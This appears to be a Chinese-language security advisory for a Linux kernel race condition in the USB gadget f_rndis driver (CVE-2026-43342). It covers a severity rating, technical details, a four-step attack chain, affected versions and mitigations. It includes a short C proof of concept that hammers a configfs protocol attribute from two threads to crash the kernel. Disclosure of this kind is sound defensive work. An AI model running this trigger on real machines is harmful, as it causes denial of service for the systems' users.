CVE-2026-43342 CVSS 4.7 中危

CVE-2026-43342 Linux内核RNDIS竞态条件漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43342

漏洞类型

竞态条件

CVSS评分

4.7 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的USB小部件f_rndis组件存在一处安全漏洞，涉及竞态条件。该问题的根本原因在于，通过configfs并发访问设备选项时，未正确使用互斥锁进行同步保护。本地低权限攻击者可以利用这一缺陷，在特定时机触发竞争窗口，导致内核数据不一致，进而可能引发系统崩溃或拒绝服务，严重影响系统可用性。

技术细节

该漏洞位于Linux内核的USB小部件子系统，具体涉及f_rndis驱动程序。问题出在RNDIS功能驱动处理配置参数时，未能对类、子类及协议等关键选项实施有效的互斥锁保护。在Linux的configfs机制中，这些参数允许用户空间程序动态配置，但原有代码实现未防止并发访问。本地攻击者可以利用多线程技术，通过精心构造的并发读写操作触发竞态窗口。当一个线程正在读取或修改配置结构体时，另一个线程的介入可能导致数据结构处于不一致的状态。这种竞态条件可能破坏内核内存布局，导致空指针解引用或越界访问，进而引发内核崩溃，导致系统拒绝服务。

攻击链分析

STEP 1

1. 本地访问

攻击者需要在目标Linux系统上拥有低权限用户账号。

STEP 2

2. 环境识别

确认系统已加载USB Gadget功能且configfs已挂载，且f_rndis模块可用。

STEP 3

3. 触发竞态

攻击者运行多线程恶意程序，高速并发地修改configfs下RNDIS设备的类、子类或协议属性。

STEP 4

4. 系统崩溃

由于缺乏互斥锁保护，内核在处理并发请求时发生数据错乱，导致空指针引用或内核崩溃，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// This is a conceptual PoC for Race Condition in f_rndis
// It attempts to trigger the race by concurrent writes to configfs attributes.

#include <stdio.h>
#include <pthread.h>
#include <unistd.h>
#include <string.h>

#define CONFIGFS_PATH "/sys/kernel/config/usb_gadget/g1/functions/rndis.usb0"

void* race_thread(void* arg) {
    char* data = (char*)arg;
    FILE *fp;
    while (1) {
        fp = fopen(CONFIGFS_PATH "/protocol", "w");
        if (fp) {
            fputs(data, fp);
            fclose(fp);
        }
    }
    return NULL;
}

int main() {
    pthread_t t1, t2;

    // Create two threads to compete writing to the protocol attribute
    pthread_create(&t1, NULL, race_thread, "1");
    pthread_create(&t2, NULL, race_thread, "255");

    printf("Starting race condition trigger on %s...\n", CONFIGFS_PATH);
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);

    return 0;
}

影响范围

Linux Kernel < 6.10-rc1

Linux Kernel < 6.9.5

Linux Kernel < 6.6.25

Linux Kernel < 6.1.85

防御指南

临时缓解措施

如果不便立即升级内核，可以通过禁用RNDIS gadget功能或严格限制configfs的访问权限（仅允许root访问）来缓解风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表